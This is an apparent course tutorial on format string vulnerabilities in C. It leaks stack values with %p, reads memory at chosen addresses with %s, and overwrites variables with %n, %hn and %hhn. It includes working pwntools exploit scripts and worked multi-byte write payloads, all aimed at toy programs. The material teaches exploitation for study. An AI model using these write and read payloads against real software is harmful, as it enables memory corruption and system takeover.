
Definition

Normal usage

A format string is a string made of ordinary characters, which are printed as-is, and conversion specifications, which tell the function how to convert and display the arguments that follow.

It is the format argument of functions such as printf() (first parameter) and fprintf() (second parameter, after the stream). Example:

printf("I have %d apples.\n", 10);
// output:
// I have 10 apples.

The string "I have %d apples.\n" is a format string.

%d is a conversion specification.
d is a conversion specifier.
Each conversion specification consumes the next argument of the function. Here, %d takes the argument that follows the format string, 10, and prints it in signed decimal notation.

More specifiers are described in the manual man 3 printf.

Let's try to print out the same value with different specifiers :

int val = 10;

printf("Decimal: %d\nFloat: %f\nHex: 0x%x", val, (double) val, val);

Output:

Decimal: 10
Float: 10.000000
Hex: 0xa

Let's try to print it in hexadecimal format 3 times.

int val = 10;

printf("%x %x %x", val, val, val);

We get :

a a a

But what happens if you have more specifiers than arguments?

Like:

int val = 10;

printf("%x %x %x", val);

We get something like this :

a f7c1ca2f 565561a4

What happened ?

As said earlier, each conversion specification expects an argument, so 3 conversion specifications require 3 arguments after the format string. Passing fewer is undefined behavior in C, but in practice printf has no way of knowing how many arguments it actually received.
On 32-bit x86, function arguments are passed on the stack. printf reads each argument from the stack, and if there are not enough, it simply takes the next value on the stack and uses it.

In the previous example, the stack right before the call to printf looked like this:

pwndbg> stack
00:0000│ esp 0xffffd1a0 ◂— 0x0
01:0004│ 0xffffd1a4 ◂— 0xa /* '\n' */
02:0008│ 0xffffd1a8 —▸ 0xf7c1ca2f ◂— '_dl_audit_preinit'
03:000c│ 0xffffd1ac —▸ 0x565561a4 (replace_me) ◂— 0x2
04:0010│ 0xffffd1b0 —▸ 0xffffd1f0

We can recognize 0xa (10 in hexadecimal) at offset 1 on the stack, followed by f7c1ca2f and 565561a4.
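The behaviour described above can be modelled in a few lines of Python. This is only a sketch: fake_printf is a hypothetical helper that understands nothing but %x, and the list stands in for the 4-byte stack words that follow the format string pointer in the dump above.

```python
def fake_printf(fmt, stack_words):
    """Tiny model of a 32-bit printf that only understands %x.

    stack_words holds the 4-byte values that follow the format string
    pointer on the stack. Every %x consumes the next one, whether or not
    the caller really passed it as an argument.
    """
    out = []
    next_slot = 0
    i = 0
    while i < len(fmt):
        if fmt.startswith("%x", i):
            out.append(format(stack_words[next_slot], "x"))
            next_slot += 1
            i += 2
        else:
            out.append(fmt[i])
            i += 1
    return "".join(out)


# Values copied from the pwndbg dump (offsets 1 to 4).
stack_after_format = [0xA, 0xF7C1CA2F, 0x565561A4, 0xFFFFD1F0]

# Only one real argument (10) was passed, yet three words are printed.
print(fake_printf("%x %x %x", stack_after_format))
```

The model never checks how many arguments were supplied, which is exactly why the two extra values appear.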

Exploit: read

Leaking the stack

Let's play with a simple example in C :

main.c
#include <stdio.h>

int main(int argc, char **argv)
{
int secret = 0xdead;
int secret2 = 0xbeef;
printf(argv[1], 10);
return 0;
}

Compile it with :

gcc main.c -o main -m32

And test it :

./main %p.%p.%p.%p.%p.%p.%p
0xa.0xf7c1ca2f.0x565561a4.0xffffd1f0.0xf7fc1678.0xbeef.0xdead
1  |2         |3         |4         |5         |6     |7

You can see the variables secret and secret2 leaked in the output, because they are stored on the stack.

If you open it in gdb, and put a breakpoint right before the call to printf(), you'd see this :

pwndbg> stack 20
00:0000│ esp 0xffffd1a0 ◂— 0x0
01:0004│ 0xffffd1a4 ◂— 0xa /* '\n' */
02:0008│ 0xffffd1a8 —▸ 0xf7c1ca2f ◂— '_dl_audit_preinit'
03:000c│ 0xffffd1ac —▸ 0x565561a4 (main+23) ◂— 0x2e5005
04:0010│ 0xffffd1b0 —▸ 0xffffd1f0 —▸ 0xf7e1cff4 (_GLOBAL_OFFSET_TABLE_) ◂— 0x21cd8c
05:0014│ 0xffffd1b4 —▸ 0xf7fc1678 —▸ 0xf7ffdbac —▸ 0xf7fc1790 —▸ 0xf7ffda40 ◂— ...
06:0018│ 0xffffd1b8 ◂— 0xbeef
07:001c│ 0xffffd1bc ◂— 0xdead
08:0020│ 0xffffd1c0 —▸ 0xffffd1e0 ◂— 0x1
09:0024│ 0xffffd1c4 —▸ 0xf7e1cff4 (_GLOBAL_OFFSET_TABLE_) ◂— 0x21cd8c
0a:0028│ ebp 0xffffd1c8 ◂— 0x0
0b:002c│ 0xffffd1cc —▸ 0xf7c23295 (__libc_start_call_main+117) ◂— add esp, 0x10

So each %p prints the next element stored on the stack, in order: the values printed by the program are offsets 1 through 7 of this dump.
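When a leak gets longer, it helps to number the values automatically. The sketch below assumes the values are separated by dots, as in the run above; parse_leak is a hypothetical helper, not part of any library.

```python
def parse_leak(output, sep="."):
    """Map each 1-based stack offset to the value printed by the matching %p."""
    values = {}
    for offset, token in enumerate(output.strip().split(sep), start=1):
        if not token:
            continue  # trailing separator
        # glibc prints NULL pointers as "(nil)" instead of 0x0
        values[offset] = 0 if token == "(nil)" else int(token, 16)
    return values


leak = parse_leak("0xa.0xf7c1ca2f.0x565561a4.0xffffd1f0.0xf7fc1678.0xbeef.0xdead")
for offset, value in leak.items():
    print(offset, hex(value))
```

With the output above, offset 6 holds 0xbeef (secret2) and offset 7 holds 0xdead (secret).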

Choosing an offset

Format string syntax lets us pick an argument by position with %<offset>$<specifier>. Since we know our value of interest is the 6th element on the stack, we can print it directly with %6$p.

./main $(echo '%6$p')
0xbeef
info

The single quotes stop the shell from expanding $p as a variable, so ./main '%6$p' works as well, without echo. You can also escape the $ with a backslash:

./main %6\$p
0xbeef
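If the command line is built from a script, the quoting can be left to Python's standard shlex module. A minimal sketch, where positional is a hypothetical helper name:

```python
import shlex


def positional(offset, conversion="p"):
    """Return a positional conversion specification such as '%6$p'."""
    return f"%{offset}${conversion}"


spec = positional(6)
print(spec)               # the raw specification
print(shlex.quote(spec))  # the same text, quoted so a POSIX shell leaves $p alone
```

Passing the argument as a list element to subprocess.run(["./main", spec]) avoids the shell entirely, so no quoting is needed in that case.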

Arbitrary read

Leaking values off the stack is nice, but what if we want to leak one specific value at a given address? It is possible, with the help of the %s specifier!

In C, a string is passed as a pointer to a NUL-terminated array of characters. The %s specifier dereferences that pointer and prints the characters found at that address until it reaches a NUL byte. Combined with an offset, %<offset>$s can be pointed at an address that we placed on the stack, so that printf prints the memory at that address.

Let's see an example in C:

// gcc main.c -o main -m32
#include <stdio.h>

int main(int argc, char **argv)
{
char *secret = "mysecret";

printf("secret is at %p\n", secret);

char buffer[30];
fgets(buffer, sizeof(buffer), stdin);

printf(buffer);
return 0;
}

In this code, the content of the string secret is never printed, only its address.
Note the use of fgets() instead of the insecure gets(): fgets() reads at most size - 1 bytes (29 here), so the buffer cannot overflow.

Our goal is to use that address to print the content of the string.

When running this program, we have :

./main
secret is at 0x56557008

And it waits for our input.

Let's first see where our input is located on the stack when printf is executed.

└─$ ./main
secret is at 0x56557008
%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
0x1e.0xf7e1d620.0x565561b4.0xf7fc7550.(nil).0xf7c1ca2f.0x7025d048.0x2e70252e.0x252e7025.0x70252e70
1   |2         |3         |4         |5    |6         |7 ^

tip

Use the python3 REPL to generate a string like that quickly and check its length.

$ python3
>>> "%p." * 10
'%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.'
>>> len("%p." * 10)
30

As we can see in the output, our format string shows up at offset 7 on the stack.
0x7025 is the byte pair p% read as a little-endian number, so in memory order it is %p.

python3
>>> bytearray.fromhex("7025")
bytearray(b'p%')

But it's cut in half: our string does not start exactly at offset 7, it is preceded by the two bytes 0xd048 (0x48 0xd0 in memory). So we pad our string to make it start exactly on an offset boundary. Let's prepend aa to our string.

└─$ ./main
secret is at 0x56557008
aa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
aa0x1e.0xf7e1d620.0x565561b4.0xf7fc7550.(nil).0xf7c1ca2f.0x6161d048.0x252e7025.0x70252e70.
  1   |2         |3         |4         |5    |6         |7 a a     |8 ^

Now, our format string %p.%p... starts exactly at offset 8 on the stack.
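To see the alignment more directly, the leaked words can be turned back into the bytes they hold in memory. The sketch below uses the standard struct module on words 7 and 8 from the two runs above; word_bytes is a hypothetical helper name.

```python
import struct


def word_bytes(value):
    """Return the 4 bytes of a 32-bit stack word in memory (little-endian) order."""
    return struct.pack("<I", value)


# Words 7 and 8 as printed by %p, without and with the 'aa' padding.
unpadded = {7: 0x7025D048, 8: 0x2E70252E}
padded = {7: 0x6161D048, 8: 0x252E7025}

for name, words in (("unpadded", unpadded), ("padded", padded)):
    for offset, value in words.items():
        print(name, offset, word_bytes(value))
```

Without padding, word 7 ends with %p and word 8 starts in the middle of the string. With the two padding bytes, word 7 ends with aa and word 8 starts with %p, the beginning of the format string.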

So we can just put the address we want to leak at that place, then point the %s specifier to that value.

question

Can you guess what the payload will look like?
Elements to re-order: [address][specifier][padding]

Answer
[padding][address][specifier]
Final Exploit
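from pwn import *

target = './main'

elf = context.binary = ELF(target)

# The address is hardcoded from the run above. The binary is PIE, so this
# only works while the address stays the same between runs (ASLR disabled).
payload = b'aa' # padding, so that the address lands exactly at offset 8
payload += p32(0x56557008) # address of the string pointed to by `secret`
payload += b'%8$s' # string specifier, dereferences the value at offset 8

p = process()
print(p.clean())
p.sendline(payload)
print(p.clean())

Output:

└─$ python3 exploit.py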
[*] '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_read/main'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_read/main': pid 27765
b'secret is at 0x56557008\n'
[*] Process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_read/main' stopped with exit code 0 (pid 27765)
b'aa\x08pUVmysecret\n'
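The payload bytes can also be reproduced without pwntools, which makes the layout easier to inspect. This is a sketch using the standard struct module; the address is the one printed in the run above and will differ on another system.

```python
import struct

SECRET_ADDR = 0x56557008  # value printed by the program in the run above

payload = b"aa"                              # padding: completes offset 7
payload += struct.pack("<I", SECRET_ADDR)    # occupies offset 8 exactly
payload += b"%8$s"                           # dereference the word at offset 8

print(payload)
print(len(payload))
```

The first six bytes match the start of the program's output, aa\x08pUV, since printf echoes them before it reaches %8$s.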

Now go practice with the easy exercises for format string.

Exploit: write

We learned that with a user-controlled format string, we can read anywhere.

But we can also write anywhere ! Thanks to the specifier %n:

%n: The number of characters written so far is stored into the integer pointed to by the corresponding argument.

Source: man 3 printf

question
int len = 0;
printf("hello %n", &len);

What is the value of len ?

Answer
6.
hello = 5 bytes
space = 1 byte

Right before the call to printf, the stack looked like this:

pwndbg> stack 20
00:0000│ esp 0xffffd1a0 ◂— 0x0
01:0004│ 0xffffd1a4 ◂— 0x56556123 (len) ◂— 0x0
...

The address of the variable len is at offset 1 on the stack, and %n overwrites the value stored at 0x56556123 (len) with the number of characters printed so far.
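The counting rule behind %n can be sketched in Python. The helper below is hypothetical and deliberately limited: it only handles literal text and the %% escape, which is enough for the quiz above.

```python
def count_at_n(fmt):
    """Return the number of characters emitted when printf reaches the first %n.

    Limitation of this sketch: only literal characters and '%%' are
    understood, other conversions are not expanded.
    """
    count = 0
    i = 0
    while i < len(fmt):
        if fmt.startswith("%n", i):
            return count
        if fmt.startswith("%%", i):
            count += 1  # '%%' prints a single '%'
            i += 2
        else:
            count += 1
            i += 1
    return None  # no %n in the format string


print(count_at_n("hello %n"))
```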

Example

Let's try with an example:

main.c
// gcc main.c -m32 -o main -no-pie
#include <stdio.h>

int replace_me = 0;

void main()
{
char buffer[30];
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);

if (replace_me == 10)
{
puts("You win !");
}
else if (replace_me != 0)
{
puts("You're close, keep trying...");
}
}

The goal is to overwrite the value of the variable replace_me with 10. A buffer overflow is not an option here, since fgets() never reads more than the buffer can hold.

Find address

First, let's find the address of the variable we want to replace. Since replace_me is a global variable and the binary was compiled with -no-pie, its address is fixed and we can read it from the symbol table with readelf.

└─$ readelf -s main | grep "replace_me"
25: 0804c01c 4 OBJECT GLOBAL DEFAULT 24 replace_me

So replace_me's address is 0x804c01c.
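In a script, the address can be pulled out of that readelf line instead of being copied by hand. A minimal sketch, assuming the usual column order of readelf -s (Num, Value, Size, Type, Bind, Vis, Ndx, Name); symbol_address is a hypothetical helper.

```python
def symbol_address(readelf_line):
    """Extract the Value column (an address in hex) from one 'readelf -s' row."""
    fields = readelf_line.split()
    return int(fields[1], 16)


line = "25: 0804c01c 4 OBJECT GLOBAL DEFAULT 24 replace_me"
address = symbol_address(line)
print(hex(address))
```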

Find stack offset

Next, we need to find where our payload will end up on the stack.

└─$ ./main
%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
0x1e.0xf7e1d620.0x804918d.0x702514a0.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70
1   |2         |3        |4 ^

It looks like our input begins in the 4th element on the stack, but it is again cut in half by two unrelated bytes (0x14a0).

So we can just add some padding to have our string located exactly at offset 5.

└─$ ./main
aa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
aa0x1e.0xf7e1d620.0x804918d.0x616114a0.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.
  1   |2         |3        |4 a a     |5 ^

Now we can build our payload. We want the stack to look like this:

└─$ ./main
aa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
aa0x1e.0xf7e1d620.0x804918d.0x616114a0.0x804c01c....
  1   |2         |3        |4 a a     |5 address of replace_me

Write exploit

from pwn import *

target = './main'
elf = context.binary = ELF(target)

REPLACE_ME = 0x0804c01c

p = process()

payload = b'aa' # padding, 2 bytes
payload += p32(REPLACE_ME) # address of variable replace_me, 4 bytes
payload += b'a' * 4 # 6 bytes written already, need to add 4 to make 10
payload += b'%5$n' # write 10 to address that is on offset 5 of the stack

print(p.clean())
p.sendline(payload)
print(p.clean())

Output:

└─$ python3 exploit.py
[*] '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_write/main'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_write/main': pid 29583
14
b''
[*] Process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_write/main' stopped with exit code 10 (pid 29583)
b'aa\x1c\xc0\x04\x08aaaa\nYou win !\n'
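The byte count that %5$n stores can be checked offline. The sketch below rebuilds the same payload with the standard struct module and counts everything that printf emits before it reaches the specifier.

```python
import struct

REPLACE_ME = 0x0804C01C  # address found with readelf

prefix = b"aa"                               # 2 bytes of padding
prefix += struct.pack("<I", REPLACE_ME)      # 4 bytes, lands at offset 5
prefix += b"a" * 4                           # 4 more bytes to reach 10

payload = prefix + b"%5$n"

print(len(prefix))   # characters printed before %5$n, i.e. the value written
print(payload)
```

Every byte of the prefix is printed literally, so its length is the value written to replace_me.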

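Instead of literal padding characters, you can let printf generate them with a field width:

  • %<length>d
  • %<length>c

The width is a minimum: %<length>c always prints exactly <length> characters, while %<length>d prints more if the number has more digits than <length>.

In our previous exploit, it would look like: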

payload = b'aa'
payload += p32(REPLACE_ME)
payload += b'%4d%5$n' # or b'%4c%5$n'
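Python's % operator follows the same width rules as C's printf for %d and %c, so it offers a quick way to check how many characters a given width produces. A small sketch with arbitrary sample values:

```python
# Width is a minimum for %d: short numbers are padded, long ones are not cut.
for value in (30, 1234567):
    text = "%4d" % value
    print(repr(text), len(text))

# %c prints one character, padded to the requested width.
text = "%4c" % "A"
print(repr(text), len(text))
```

This is why %<length>c is the more predictable choice when the value of the consumed argument is unknown.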

Automate with pwntools

Pwntools has a helper for automating %n format string exploits:

payload = fmtstr_payload(offset, {location: value}, numbwritten)
  • offset is the offset we found on the stack
  • location is the address where we want to write
  • value is the value we want to write at location
  • numbwritten (optional) is the number of bytes already written by printf

The dictionary can contain more values if needed, in case we need to write at multiple addresses.

Check https://docs.pwntools.com/en/stable/fmtstr.html#pwnlib.fmtstr.FmtStr for more details.

For our example, the payload would look like :

payload = b'aa'
payload += fmtstr_payload(5, {REPLACE_ME: 10}, 2)
  • 5 is offset on the stack
  • 2 is to match b'aa' that were already written

Multi-byte write

What if we want to write a very large number? Like 0xbabeface, at address 0xffffaaaa?

We can't write it in one go: %n stores the number of characters printed so far, which printf counts in an int. The maximum value of an int is 2,147,483,647, and 0xbabeface is 3,133,078,222 in decimal, so the count would overflow (and printing billions of characters is impractical anyway).

So we need to split the write into several smaller writes. We can either:

  • write byte by byte (little-endian, so in reverse order):
    0xffffaaaa: 0xce
    0xffffaaab: 0xfa
    0xffffaaac: 0xbe
    0xffffaaad: 0xba
    You can use %hhn to write a single byte
  • write 2 shorts (2 bytes + 2 bytes):
    0xffffaaaa: 0xface
    0xffffaaac: 0xbabe
    You can use %hn to write a short
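The two splits listed above can be computed rather than worked out by hand. A minimal sketch for a 32-bit little-endian target; split_writes is a hypothetical helper name.

```python
def split_writes(address, value, size):
    """Split a 32-bit value into little-endian chunks of `size` bytes.

    Returns a list of (address, chunk) pairs, lowest address first.
    """
    mask = (1 << (8 * size)) - 1
    return [(address + i, (value >> (8 * i)) & mask) for i in range(0, 4, size)]


TARGET = 0xFFFFAAAA
VALUE = 0xBABEFACE

print(VALUE > 2**31 - 1)  # too large for a single int-sized count

for addr, chunk in split_writes(TARGET, VALUE, 1):   # for %hhn
    print(hex(addr), hex(chunk))

for addr, chunk in split_writes(TARGET, VALUE, 2):   # for %hn
    print(hex(addr), hex(chunk))
```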
question

What would the payload look like if we wanted to overwrite the value at address 0xffffaaaa with value 0xbabeface, and:

  • using bytes write (%hhn)
  • payload starts at offset 5
Hint 1
Payload layout :
[1st writing][offset specifier][2nd writing][offset specifier] [3rd writing][offset specifier][4th writing][offset specifier] [1st address][2nd address][3rd address][4th address]
Hint 2
Start by writing the smallest byte, 0xba, then write the others in ascending order (smallest to largest).
Hint 3
Do not forget to take into account previously written bytes.
Answer
%186c%16$hhn%4c%17$hhn%16c%18$hhn%44c%19$hhn\xad\xaa\xff\xff\xac\xaa\xff\xff\xaa\xaa\xff\xff\xab\xaa\xff\xff
  • %186c: we first write ba because it's the smallest byte
  • %16$hhn: we write on the address at offset 16, which should be 0xffffaaad (offset determined at the end)
  • %4c: next byte to print is be, and we already printed 186 chars, so we need 0xbe - 0xba = 4 more to reach be
  • %17$hhn: we write on the address at offset 17, which should be 0xffffaaac
  • %16c: next byte to print is ce, and we already printed 190 chars, so we need 0xce - 0xbe = 16 to print ce
  • %18$hhn: we write on the address at offset 18, which should be 0xffffaaaa
  • %44c: next byte to print is fa, and we already printed 206 chars, so we need 0xfa - 0xce = 44 to print fa
  • %19$hhn: we write on the address at offset 19, which should be 0xffffaaab
  • \xad\xaa\xff\xff: 0xffffaaad packed in little-endian
  • \xac\xaa\xff\xff: 0xffffaaac packed in little-endian
  • \xaa\xaa\xff\xff: 0xffffaaaa packed in little-endian
  • \xab\xaa\xff\xff: 0xffffaaab packed in little-endian

To calculate the offsets, you need to craft the whole payload first.

%186c%$hhn%4c%$hhn%16c%$hhn%44c%$hhn

Then you calculate the total length of the payload:

>>> len('%186c%$hhn%4c%$hhn%16c%$hhn%44c%$hhn')
36

36 / 4 = 9, so this payload without offsets takes 9 slots on the stack.
We know that our offsets will be at least 5 + 9 = 14, so each offset takes 2 digits (2 bytes). We have 4 offsets to place, so 4 * 2 = 8 bytes. The total length of the format part is 36 + 8 = 44 bytes, a multiple of 4, so no padding is needed to align the addresses (they start exactly on an offset boundary). 44 / 4 = 11, so our first address lands at offset 5 + 11 = 16.
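The offset calculation is circular (the offsets depend on the payload length, which depends on the number of digits in the offsets), so a script can simply retry until the guess is stable. The following is a sketch under stated assumptions, not the pwntools implementation: build_write_payload is a hypothetical helper, it targets 32-bit little-endian, and it requires all written values to be distinct.

```python
import struct


def build_write_payload(writes, start_offset, length_modifier):
    """Build a positional %n-style payload for a 32-bit target.

    writes: list of (address, value) pairs with distinct values.
    start_offset: stack offset at which the payload begins.
    length_modifier: "hh" for %hhn (1 byte) or "h" for %hn (2 bytes).
    """
    # The character count only grows, so write the smallest value first.
    ordered = sorted(writes, key=lambda pair: pair[1])
    guess = start_offset
    for attempt in range(16):
        fmt = ""
        printed = 0
        for index, (addr, value) in enumerate(ordered):
            fmt += f"%{value - printed}c%{guess + index}${length_modifier}n"
            printed = value
        padding = -len(fmt) % 4  # align the addresses on a 4-byte slot
        first_addr_offset = start_offset + (len(fmt) + padding) // 4
        if first_addr_offset == guess:
            addresses = b"".join(struct.pack("<I", addr) for addr, value in ordered)
            return fmt.encode() + b"a" * padding + addresses
        guess = first_addr_offset
    raise ValueError("offsets did not stabilise")


byte_writes = [
    (0xFFFFAAAA, 0xCE),
    (0xFFFFAAAB, 0xFA),
    (0xFFFFAAAC, 0xBE),
    (0xFFFFAAAD, 0xBA),
]
payload = build_write_payload(byte_writes, start_offset=5, length_modifier="hh")
print(payload)
```

For these inputs the loop settles on offset 16 for the first address, matching the manual calculation.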

question

What would the payload look like if we wanted to overwrite the value at address 0xffffaaaa with value 0xbabeface, and:

  • using shorts write (%hn)
  • payload starts at offset 5
Hint 1
Payload layout :
[1st writing][offset specifier][2nd writing][offset specifier][1st address][2nd address]
Hint 2
Start by writing 0xbabe.
Hint 3
Each element on the stack is 4 bytes. You may need to pad your payload (before [1st address]), so that your addresses start exactly at a certain offset.
Answer
%47806c%12$hn%16400c%13$hnaa\xac\xaa\xff\xff\xaa\xaa\xff\xff
  • %47806c: we first write babe (0xbabe = 47806) because it's smaller than face, and the character count only goes up
  • %12$hn: we write to the address at offset 12, which should be 0xffffaaac
  • %16400c: we already printed 47806 chars, so we need 0xface - 0xbabe = 16400 more to reach face
  • %13$hn: we write to the address at offset 13, which should be 0xffffaaaa
  • aa: padding to add, so that total length is aligned to 4 bytes (multiple of 4)
  • \xac\xaa\xff\xff: 0xffffaaac packed in little-endian
  • \xaa\xaa\xff\xff: 0xffffaaaa packed in little-endian

The offsets are 12 and 13, because the string %47806c%12$hn%16400c%13$hnaa contains 28 bytes. 28 / 4 = 7 elements on the stack.
Since our payload starts at offset 5, 5 + 7 = 12, so our addresses will start on the stack at offset 12, then 13.
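The arithmetic of this answer can be double-checked in a few lines of Python. This sketch only recomputes the numbers used in the explanation; the variable names are illustrative.

```python
START_OFFSET = 5  # the payload begins at offset 5 on the stack

fmt = b"%47806c%12$hn%16400c%13$hn"
padding = b"a" * (-len(fmt) % 4)          # bytes needed to reach a multiple of 4
slots = (len(fmt) + len(padding)) // 4    # 4-byte stack slots used before the addresses

print(0xBABE, 0xFACE - 0xBABE)            # widths used by the two %c
print(len(fmt), len(padding), slots)
print(START_OFFSET + slots)               # offset of the first address
```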